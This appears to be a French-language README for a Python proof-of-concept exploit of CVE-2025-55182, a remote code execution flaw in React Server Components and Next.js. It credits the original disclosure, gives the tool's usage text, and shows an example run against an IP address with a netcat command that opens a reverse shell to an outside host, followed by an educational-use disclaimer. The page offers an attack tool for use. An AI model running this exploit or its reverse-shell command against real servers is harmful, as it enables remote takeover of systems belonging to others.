
Exploit CVE-2025-55182 | par infrar3d
Exploité par infrar3d
Une vulnérabilité critique de sévérité 10.0 affectant l'utilisation côté serveur de React.js, suivie sous la référence CVE-2025-55182 dans React.js et CVE-2025-66478 spécifiquement pour le framework Next.js.
Cette vulnérabilité a été divulguée de manière responsable par Lachlan Davidson le 29 novembre 2025 PT à l'équipe Meta. La divulgation initiale et la publication du correctif ont été effectuées par React et Vercel le 3 décembre 2025 PT. (Original : https://react2shell.com/)
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
Ce logiciel et ce code de preuve de concept sont fournis uniquement à des fins éducatives et de recherche.
Vous êtes responsable du respect de toutes les lois applicables. Utilisez-le de manière éthique et responsable.